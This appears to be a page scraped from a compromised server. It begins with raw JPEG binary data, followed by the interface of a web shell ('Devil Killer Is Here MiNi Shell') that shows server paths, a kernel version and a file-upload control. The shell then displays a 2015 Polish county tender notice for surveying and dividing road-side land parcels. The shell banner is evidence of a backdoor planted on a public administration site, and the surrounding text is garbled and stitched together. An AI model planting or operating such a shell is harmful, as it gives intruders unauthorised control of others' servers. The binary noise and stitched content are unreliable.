JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150716/179672-N-2015.html

<p class="kh_header"><b>Częstochowa: Wykonanie podziału działek położonych na terenie Powiatu Częstochowskiego- 4 części</b><br>
<b>Numer ogłoszenia: 179672 - 2015; data zamieszczenia: 16.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Częstochowski , ul. Jana III Sobieskiego 9, 42-200 Częstochowa, woj. śląskie, tel. 034 3229100, 3229126, faks 034 3229111.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie podziału działek położonych na terenie Powiatu Częstochowskiego- 4 części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ 1 -Borowno, gmina Mykanów
1. Zadanie polega na:
a) wykonaniu podziału działek położonych w obrębie Borowno, gminie Mykanów,  oznaczonych numerami ewidencyjnymi:
- 1416, 1417, 1418, 1419, 1420, 1421, 1423, 1424, 1425, 1426, 1427, 1428, 1429, 1430 - k.m.3;
- 1034 k.m.4;
 - 445, 448/4, 446 - k.m.1;
- 1246 k.m.2;
zajętych pod  drogę powiatową nr 1025 S, w celu realizacji przepisu  art.73 ustawy z dnia 13 października 1998r. - Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.),

b) wykonaniu podziału działki położonej w obrębie Borowno, gmina Mykanów oznaczonej numerem ewidencyjnym 442 k.m.1, zajętej pod drogę powiatową, w celu realizacji przepisu art.95 pkt 4 ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (t.j. Dz. U. z 2015 r., poz.782); 

c) ustaleniu stanu zagospodarowania działek zajętych pod drogę, wydzielonych z nieruchomości  wymienionych w punkcie -a -na dzień 31 grudnia 1998 r. i obecnie     oraz sporządzeniu z tej czynności opinii.

CZĘŚĆ 2 - Borowno Kolonia, gmina Mykanów

1.Zadanie polega na:
a) wykonaniu podziału działek położonych w obrębie Borowno Kolonia, gminie Mykanów,  oznaczonych numerami ewidencyjnymi:
- 3/4, 3/5, 4 - k.m.1;
- 474, 478, 481/3, 481/4, 481/2, 486/1, 485, 486/2, 499, 500, 501, 498, 497, 549, 547, 546  - k.m.10;
- 367, 368, 369, 370, 371, 372, 373 - k.m.8;
- 428, 427, 426, 415, 414, 413, 412, 411, 410, 409, 408 - k.m.9; 
zajętych pod  drogę powiatową nr 1025 S, w celu realizacji przepisu  art.73 ustawy z dnia 13 października 1998 r. - Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.),
Koncepcja podziału nieruchomości powinna być uzgodniona z zamawiającym i Powiatowym Zarządem Dróg w Częstochowie.

Dodatkowo Wykonawca wkreśli na mapie z projektem podziału zasięg pasa drogowego  po uzyskaniu od Powiatowego Zarządu Dróg w Częstochowie oświadczenia o zasięgu pasa  na dzień 31 grudnia 1998 r. 
Wykonawca przekaże całość dokumentacji do PODGiK w Częstochowie celem przeprowadzenia stosownej kontroli i przyjęcia do zasobu.

b) Wykonawca dołoży wszelkich starań w celu szerokiego zebrania informacji o stanie nieruchomości i zasięgu pasa drogowego w dacie 31 grudnia 1998 r. od właścicieli działek i zarządcy drogi. Dla ustalenia linii podziału działek, Wykonawca przeanalizuje wszystkie dostępne materiały zgromadzone w zasobie PODGiK w Częstochowie, w szczególności operaty jednostkowe, zasób bazowy do mapy zasadniczej oraz ortofotomapę celem odszukania informacji o sposobie zagospodarowania i zainwestowania działek zajętych pod  drogę. 
Z czynności tej Wykonawca sporządzi opinię dla każdej działki zajętej pod drogę, wydzielonej z nieruchomości wymienionych w punkcie -a- w 2 egzemplarzach, wskazującej, jakie elementy pasa drogowego znajdowały się w obszarze wydzielonej nieruchomości w dniu 31 grudnia 1998 r. i znajdują się obecnie. 
Sporządzając w/w dokumentację, Wykonawca uwzględni stanowisko Ministra Infrastruktury i Rozwoju wyrażone w piśmie z dnia 29 stycznia 2015 r. nr DOI.2.6610.2.2015.PW.  W/w pismo stanowi załącznik do niniejszych wytycznych.

CZĘŚĆ 3 - Siedlec gmina Janów, Kuźnica Lechowa gmina Mykanów
1. Zadanie polega na: 
a) wydzieleniu z działek: 
- nr 369/1 k.m.6 o pow.0,0420 ha obręb Siedlec, gmina Janów, 
- nr 346 k.m.3 o pow. 0,0210 ha (poprzedni numer ewidencyjny 18/4 k.m.3)  obręb Kuźnica Lechowa, gmina Mykanów części zajętej pod drogę powiatową w trybie przepisu art.73 ustawy z dnia 13 października 1998 r. - Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.)
W/w działki wymienione zostały odpowiednio: w ostatecznej decyzji nr 6/2010 Starosty Częstochowskiego z dnia 24 września 2010 r. (znak sprawy AB-IV-7332/4/5/10) o zezwoleniu na realizację inwestycji drogowej obejmującej przebudowę drogi powiatowej nr 1066 S Zrębice - Krasawa - Siedlec - do DW 793 oraz w ostatecznej decyzji nr 5/2010 Starosty Częstochowskiego z dnia 21 lipca 2010 r. (znak sprawy AB-IV-7332/3/4/10) o zezwoleniu na realizację inwestycji drogowej obejmującej przebudowę drogi powiatowej nr 1025 S na odc. od granicy powiatu kłobuckiego - Kuźnica Kiedrzyńska - Kokawa jako znajdujące się w liniach rozgraniczających teren inwestycji drogowej. 
W ewidencji gruntów i budynków figuruje zapis, że na podstawie w/w dokumentów stanowią własność Powiatu Częstochowskiego. Niemniej z treści w/w decyzji wynika,  że działki: nr 369/1 k.m.6 obręb Siedlec, nr 346 k.m.3 obręb Kuźnica Lechowa stały się własnością Powiatu Częstochowskiego z dniem, w którym w/w decyzje stały się ostateczne,  o ile przejście w/w działek na własność Powiatu Częstochowskiego nie nastąpiło w trybie przepisu art.73 w. cyt. ustawy - Przepisy wprowadzające ustawy reformujące administrację publiczną. W księgach wieczystych zmiany  nie zostały wprowadzone.

CZĘŚĆ 4 - Zarębice, Biskupice, Zaróg, Widzów
1.  Określenie przedmiotu zamówienia:
Zadanie polega na: wykonaniu podziału niżej wymienionych nieruchomości stanowiących własność Agencji Nieruchomości Rolnych tj.:
1) Nieruchomości położonej w obrębie ewidencyjnym 0015 Zarębice, gmina Przyrów, oznaczonej w rejestrze ewidencji gruntów i budynków jako działka nr 64, karta mapy 7, polegający na wydzieleniu części w/w działki przewidzianej w miejscowym planie zagospodarowania przestrzennego gminy Przyrów pod poszerzenie drogi powiatowej nr 1096 S relacji Przyrów - Podlesie - Drochlin; dla przedmiotowej nieruchomości Sąd Rejonowy w Myszkowie Wydział Ksiąg Wieczystych prowadzi księgę wieczystą CZ1M/00093730/6;

2) Nieruchomości położonej w obrębie ewidencyjnym 0001 Biskupice, gmina Olsztyn, oznaczonej w rejestrze ewidencji gruntów i budynków jako działka nr 178/3, karta mapy 4, polegający na wydzieleniu części w/w działki przewidzianej w miejscowym planie zagospodarowania przestrzennego gminy Olsztyn pod poszerzenie drogi powiatowej nr 1012 S relacji Zrębice - Biskupice - Choroń;

3) Nieruchomości położonej w obrębie ewidencyjnym 0023 Zaróg, gmina Koniecpol, oznaczonej w rejestrze ewidencji gruntów i budynków jako działka nr 872, karta mapy 2, polegający na wydzieleniu części w/w działki przewidzianej w miejscowym planie zagospodarowania przestrzennego gminy Koniecpol pod poszerzenie drogi powiatowej nr 1092 S relacji Kuźnica Grodziska - Żelisławice - Bugaj; dla przedmiotowej nieruchomości Sąd Rejonowy w Myszkowie Wydział Ksiąg Wieczystych prowadzi księgę wieczystą CZ1M/000037505/0;

4) Nieruchomości położonej w obrębie ewidencyjnym 0010 Widzów, gmina Kruszyna, oznaczonej w rejestrze ewidencji gruntów i budynków jako działki: nr 1135, nr 1137, nr 1138, nr 1242 i nr 1244, karta mapy 1, polegający na wydzieleniu części w/w działek przewidzianych w miejscowym planie zagospodarowania przestrzennego gminy Kruszyna pod poszerzenie drogi powiatowej nr 1006 S relacji Wikłów - Lgota Mała - Antoniów - do DP 1025 S; dla przedmiotowych działek Sąd Rejonowy w Częstochowie Wydział Ksiąg Wieczystych prowadzi księgi wieczyste: CZ1C/00167605/1, CZ1C/00105766/5, CZ1C/00157506/4. 

Podział nieruchomości następuje w trybie przepisu art. 98 ust. 1 i ust. 2 ustawy 
z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (Dz. U. z 2015 r., poz. 782) 
w związku z art. 93 ust. 1 i art. 97 ust. 1 tej ustawy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1, 71.22.22.00-2, 71.35.40.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie właściwego oświadczenia stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie właściwego oświadczenia stanowiącego załącznik nr 2 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie właściwego oświadczenia stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeśli Wykonawca oświadczy, iż spełnia warunek dot. dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania przedmiotowego zamówienia tj. osobami posiadającymi uprawnienia zawodowe z zakresu 1 i 2 -go w dziedzinie geodezji i kartografii (dotyczy Części nr 1, 2, 3).

Zamawiający uzna w/w warunek za spełniony, jeśli Wykonawca oświadczy, iż spełnia warunek dot. dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania przedmiotowego zamówienia tj. osobami posiadającymi uprawnienia zawodowe z zakresu 2 -go w dziedzinie geodezji i kartografii (dotyczy Części nr 4).
Ocena będzie dokonana na podstawie właściwego oświadczenia dotyczącego wymaganych uprawnień osób, które będą uczestniczyć w wykonywaniu zamówienia stanowiącego załącznik nr 4 do SIWZ,
oraz Ocena będzie dokonana na podstawie właściwego oświadczenia stanowiącego załącznik nr 2 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena będzie dokonana na podstawie właściwego oświadczenia stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- druk oferty zgodny ze wzorem stanowiącym załącznik nr 1 do SIWZ
- pełnomocnictwo podmiotów występujących wspólnie (jeżeli dotyczy),
- pełnomocnictwo dla osoby/osób podpisującej ofertę i oświadczenia (jeśli uprawnienie tych  osób nie wynika z innych dokumentów dołączonych do oferty).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Termin wykonania zamówienia - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartych umów 
w stosunku do oferty, na podstawie której dokonano wyboru Wykonawcy.
Warunki takiej zmiany: zmiana terminu wykonania przedmiotu zamówienia wynikająca 
z przyczyn niezależnych od Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-czestochowski.4bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Częstochowie
ul. Jana III Sobieskiego 9
42-217 Częstochowa, pok. nr 229
lub drogą elektroniczną: przetargi@czestochowa.powiat.pl, peryga@czestochowa.powiat.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2015 godzina 11:30, miejsce: Starostwo Powiatowe w Częstochowie
ul. Jana III Sobieskiego 9
42-217 Częstochowa, pok. nr 3 (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ 1 -Borowno, gmina Mykanów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zadanie polega na:
a) wykonaniu podziału działek położonych w obrębie Borowno, gminie Mykanów,  oznaczonych numerami ewidencyjnymi:
- 1416, 1417, 1418, 1419, 1420, 1421, 1423, 1424, 1425, 1426, 1427, 1428, 1429, 1430 - k.m.3;
- 1034 k.m.4;
 - 445, 448/4, 446 - k.m.1;
- 1246 k.m.2;
zajętych pod  drogę powiatową nr 1025 S, w celu realizacji przepisu  art.73 ustawy z dnia 13 października 1998r. - Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.),

b)wykonaniu podziału działki położonej w obrębie Borowno, gmina Mykanów oznaczonej numerem ewidencyjnym 442 k.m.1, zajętej pod drogę powiatową, w celu realizacji przepisu art.95 pkt 4 ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (t.j. Dz. U. z 2015 r., poz.782) 

c)ustaleniu stanu zagospodarowania działek zajętych pod drogę, wydzielonych    z nieruchomości  wymienionych w punkcie -a- na dzień 31 grudnia 1998 r. i obecnie oraz sporządzeniu z tej czynności opinii..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1, 71.22.22.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin wykonania zamówienia - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ 2 - Borowno Kolonia, gmina Mykanów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zadanie polega na:
a) wykonaniu podziału działek położonych w obrębie Borowno Kolonia, gminie Mykanów,  oznaczonych numerami ewidencyjnymi:
- 3/4, 3/5, 4 - k.m.1;
- 474, 478, 481/3, 481/4, 481/2, 486/1, 485, 486/2, 499, 500, 501, 498, 497, 549, 547, 546 - k.m.10;
- 367, 368, 369, 370, 371, 372, 373 - k.m.8;
- 428, 427, 426, 415, 414, 413, 412, 411, 410, 409, 408 - k.m.9 ;
zajętych pod  drogę powiatową nr 1025 S, w celu realizacji przepisu  art.73 ustawy z dnia 13 października 1998 r. - Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1, 71.22.22.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin wykonania zamówienia - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ 3 - Siedlec gmina Janów, Kuźnica Lechowa gmina Mykanów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zadanie polega na: 
a) wydzieleniu z działek: 
- nr 369/1 k.m.6 o pow.0,0420 ha obręb Siedlec, gmina Janów, 
- nr 346 k.m.3 o pow. 0,0210 ha (poprzedni numer ewidencyjny 18/4 k.m.3)  obręb Kuźnica Lechowa, gmina Mykanów części zajętej pod drogę powiatową w trybie przepisu art.73 ustawy z dnia 13 października 1998 r. - Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1, 71.22.22.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin wykonania zamówienia - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ 4 - Zarębice, Biskupice, Zaróg, Widzów.</p>
